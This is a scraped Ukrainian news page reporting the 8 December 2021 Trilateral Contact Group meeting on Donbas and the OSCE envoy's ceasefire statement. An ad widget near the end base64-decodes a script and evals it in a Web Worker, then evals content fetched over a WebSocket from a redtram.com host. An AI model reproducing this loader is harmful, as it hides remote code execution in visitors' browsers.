<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-1689781-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-1689781-1');
</script>

<meta charset="utf-8">
<title>Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content=" 8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной группы по урегулированию российской агрессии в Луганской и Донецкой областях. Традиционно для последних двух лет заседание закончилось ничем. 8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной">
<meta name="keywords" content="прекращения, контактной, Луганской, декабря, заседание, ситуация, сфере, безопасности, состоялось, вдоль, линии, соприкосновения, закончилось, ничем, последних, российской, очередное, заседание Трехсторонней, группы, урегулированию">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня">
<meta property="og:url" content="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-12/medium/1639054599_minsk.jpg">
<meta property="og:description" content="8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной группы по урегулированию российской агрессии в Луганской и Донецкой областях. Традиционно для последних двух лет заседание закончилось ничем. По итогам заседания Специальный представитель Действующего председателя ОБСЕ в">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня</h1>
<a href="http://www.citynews.net.ua/2021/12/09/" ><span class="date">Вчера, 14:56</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html" data-title="Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2021-12/medium/1639054599_minsk.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;">8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной группы по урегулированию российской агрессии в Луганской и Донецкой областях.</p>
<p>Традиционно для последних двух лет заседание закончилось ничем.</p>
<p>По итогам заседания Специальный представитель Действующего председателя ОБСЕ в Украине и в Трехсторонней контактной группе (ТКГ) посол Микко Киннунен сделал следующее заявление:</p>
<p>«В центре внимания сегодняшней встречи была ситуация в сфере безопасности. Состоялись длительные дискуссии о необходимости обеспечить соблюдение соглашения о прекращении огня от 22 июля 2020 года. Существует общее понимание того, что долгосрочное прекращение огня является приоритетом.</p>
<p>Приглашаю участников к дальнейшей конструктивной работе.</p>
<p>Хотя количество нарушений режима прекращения огня, согласно данным СММ, за последние две недели уменьшилось по сравнению с двумя предыдущими неделями, ситуация в сфере безопасности вдоль линии соприкосновения по-прежнему вызывает озабоченность ввиду значительной активизации боевых действий.</p>
<p>Миссия продолжает сообщать о наблюдениях за БПЛА, не относящимися к СММ, вдоль линии соприкосновения, а свобода передвижения Миссии подвергается еще более существенным ограничениям, особенно в оккупированных районах Луганской области Украины (ОРЛО).</p>
<p>В итоге попытки призвать российских террористов соблюдать режим прекращения огня уложились в одну простую фразу "Рабочая группа по безопасности подробно обсудила тему усиления режима прекращения огня, однако стороны не достигли единого понимания."</p>
<p>В переводе с языка ОБСЕ на нормальный это означает, что российские боевики отказываются выполнять договоренности и продолжат обстрелы украинской территории из всех доступных видов оружия.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/86776-8-9-ijunja-projdut-ocherednye-zasedanija-tkg-po-uregulirovaniju-rossijskoj-agressii-na-donbasse.html">8-9 июня пройдут очередные заседания ТКГ по урегулированию российской агрессии на Донбассе</a></li><li><a href="http://www.citynews.net.ua/news/86592-na-18-i-19-maja-zaplanirovany-ocherednye-zasedanija-tkg-po-donbassu.html">На 18 и 19 мая запланированы очередные заседания ТКГ по Донбассу</a></li><li><a href="http://www.citynews.net.ua/news/86451-27-28-aprelja-projdut-ocherednye-zasedanija-tkg-po-uregulirovaniju-rossijskoj-agressii-v-luganskoj-i-doneckoj-oblastjah.html">27-28 апреля пройдут очередные заседания ТКГ по урегулированию российской агрессии в Луганской и Донецкой областях</a></li><li><a href="http://www.citynews.net.ua/news/62276-v-minske-nachala-zasedanie-trehstoronnyaya-kontaktnaya-gruppa-po-donbassu.html">В Минске начала заседание Трехсторонняя контактная группа по Донбассу</a></li><li><a href="http://www.citynews.net.ua/news/55201-uchastniki-trehstoronney-kontaktnoy-gruppy-poobschalis-vo-vremya-skayp-vstrechi.html">Участники трехсторонней контактной группы пообщались во время скайп-встречи</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Вчера, 16:01</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88193-rossijskie-boeviki-opjat-obstrelivajut-stanicu-luganskuju-iz-artillerii-video.html">Российские боевики опять обстреливают Станицу Луганскую из артиллерии - видео</a></h4><span>Вчера, 15:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88192-kabmin-izmenil-porjadok-kompensacii-za-razrushennoe-zhile-v-luganskoj-i-doneckoj-oblastjah.html">Кабмин изменил порядок компенсации за разрушенное жилье в Луганской и Донецкой областях</a></h4><span>Вчера, 14:56</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html">Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня</a></h4><span>Вчера, 14:48</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88190-v-luganske-mikroavtobus-podrezal-marshrutku-7-postradavshih.html">В Луганске микроавтобус подрезал маршрутку - 7 пострадавших</a></h4><span>Вчера, 13:50</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88189-v-mariupole-strelboj-po-kolesam-ostanavlivali-pjanogo-voditelja.html">В Мариуполе стрельбой по колесам останавливали пьяного водителя</a></h4><span>Вчера, 13:45</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88188-v-ukrainu-importirovali-bez-nds-tovarov-dlja-borby-s-covid-19-na-milliard-dollarov.html">В Украину импортировали без НДС товаров для борьбы с COVID-19 на миллиард долларов</a></h4><span>Вчера, 11:56</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88187-v-luganskoj-oblasti-podtverdili-vspyshku-ptichego-grippa-neskolko-sel-na-karantine.html">В Луганской области подтвердили вспышку птичьего гриппа - несколько сел на карантине</a></h4><span>Вчера, 10:46</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88186-v-luganskoj-oblasti-146-novyh-sluchaev-covid-19.html">В Луганской области 146 новых случаев COVID-19</a></h4><span>Вчера, 10:38</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88185-rossijskie-boeviki-obstrelivali-novoaleksandrovku-iz-granatometov.html">Российские боевики обстреливали Новоалександровку  из гранатометов</a></h4><span>8-12-2021, 16:00</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88184-v-luganskoj-oblasti-policejskie-otkryli-ugolovnoe-delo-na-zhenschinu-s-poddelnym-covid-sertifikatom.html">В Луганской области полицейские открыли уголовное дело на женщину с поддельным COVID-сертификатом</a></h4><span>8-12-2021, 15:00</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88183-v-luganskoj-oblasti-gorskaja-gromada-poluchila-novyj-socialnyj-transport-ot-oon.html">В Луганской области Горская громада получила новый социальный транспорт от ООН</a></h4><span>8-12-2021, 13:49</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88182-sud-razreshil-zaderzhat-byvshego-ministra-jenergetiki-i-ugolnoj-promyshlennosti-vladimira-demchishina.html">Суд разрешил задержать бывшего министра энергетики и угольной промышленности Владимира Демчишина</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>7-12-2021, 12:21</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88174-pod-chernigovom-gruzovik-stolknulsja-s-marshrutkoj-13-pogibshih.html">Под Черниговом грузовик столкнулся с маршруткой - 13 погибших</a></h4><span>6-12-2021, 15:48</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88167-oborudovanie-dlja-piccerii-i-pech-dlja-piccy-ot-a-do-ja.html">Оборудование для пиццерии и печь для пиццы от А до Я</a></h4><span>6-12-2021, 15:43</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88164-kak-kupit-sajding-v-harkove-poleznye-sovety-dlja-zakazchikov.html">Как купить сайдинг в Харькове – полезные советы для Заказчиков</a></h4><span>29-11-2021, 12:58</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88122-v-odesse-soobschili-o-minirovanii-ajeroporta.html">В Одессе сообщили о минировании аэропорта</a></h4><span>25-11-2021, 11:49</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88104-chem-aktivnaja-akustika-luchshe-passivnoj.html">Чем активная акустика лучше пассивной</a></h4><span>24-11-2021, 18:18</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88099-chto-podarit-blizkim-ljudjam.html">Что подарить близким людям?</a></h4><span>23-11-2021, 15:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88088-23-nojabrja-v-kieve-ogranichat-vhod-i-vyhod-na-stancijah-metro-dvorec-sporta-olimpijskaja-i-ploschad-lva-tolstogo.html">23 ноября в Киеве ограничат вход и выход на станциях метро «Дворец спорта», «Олимпийская» и «Площадь Льва Толстого»</a></h4><span>23-11-2021, 11:28</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88076-v-odessu-dostavili-2-voennyh-katera-iz-ssha.html">В Одессу доставили 2 военных катера из США</a></h4><span>22-11-2021, 10:44</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/88068-mid-ukrainy-sdelalo-zajavlenie-o-nachale-slushanij-v-irane-dela-po-unichtozheniju-samoleta-ps752.html">МИД Украины сделало заявление о начале слушаний в Иране дела по уничтожению самолета PS752</a></h4><span>17-11-2021, 15:12</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88037-novaja-pochta-bespilotnikom-dostavila-16-posylok-iz-kieva-vo-lvov-.html">Новая почта беспилотником доставила 16 посылок из Киева во Львов </a></h4><span>17-11-2021, 10:43</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88032-top-5-universalnyh-podarkov-sotrudnikam-na-novyj-god.html">Топ 5 универсальных подарков сотрудникам на Новый год</a></h4><span>16-11-2021, 18:52</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/88027-v-kieve-planirujut-uvelichit-platu-za-proezd-do-12-i-22-griven.html">В Киеве планируют увеличить плату за проезд до 12 и 22 гривень</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
				

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('11','2021','right'); return false;" href="http://www.citynews.net.ua/2021/11/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Декабрь 2021&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="2">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/01/" title="Все публикации за 01 декабря 2021">1</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/02/" title="Все публикации за 02 декабря 2021">2</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/03/" title="Все публикации за 03 декабря 2021">3</a></td><td  class="weekday" >4</td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2021/12/05/" title="Все публикации за 05 декабря 2021">5</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/06/" title="Все публикации за 06 декабря 2021">6</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/07/" title="Все публикации за 07 декабря 2021">7</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/08/" title="Все публикации за 08 декабря 2021">8</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/12/09/" title="Все публикации за 09 декабря 2021">9</a></td><td  class="day day-current" >10</td><td  class="weekday" >11</td><td  class="weekday" >12</td></tr><tr><td  class="day" >13</td><td  class="day" >14</td><td  class="day" >15</td><td  class="day" >16</td><td  class="day" >17</td><td  class="weekday" >18</td><td  class="weekday" >19</td></tr><tr><td  class="day" >20</td><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="day" >24</td><td  class="weekday" >25</td><td  class="weekday" >26</td></tr><tr><td  class="day" >27</td><td  class="day" >28</td><td  class="day" >29</td><td  class="day" >30</td><td  class="day" >31</td><td colspan="2">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content=" 8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной группы по урегулированию российской агрессии в Луганской и Донецкой областях. Традиционно для последних двух лет заседание закончилось ничем. 8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной">
<meta name="keywords" content="прекращения, контактной, Луганской, декабря, заседание, ситуация, сфере, безопасности, состоялось, вдоль, линии, соприкосновения, закончилось, ничем, последних, российской, очередное, заседание Трехсторонней, группы, урегулированию">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Итоги заседания ТКГ по Донбассу: Российские боевики отказываются соблюдать режим прекращения огня">
<meta property="og:url" content="http://www.citynews.net.ua/news/88191-itogi-zasedanija-tkg-po-donbassu-rossijskie-boeviki-otkazyvajutsja-sobljudat-rezhim-prekraschenija-ognja.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-12/medium/1639054599_minsk.jpg">
<meta property="og:description" content="8 декабря 2021 года состоялось очередное заседание Трехсторонней контактной группы по урегулированию российской агрессии в Луганской и Донецкой областях. Традиционно для последних двух лет заседание закончилось ничем. По итогам заседания Специальный представитель Действующего председателя ОБСЕ в">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
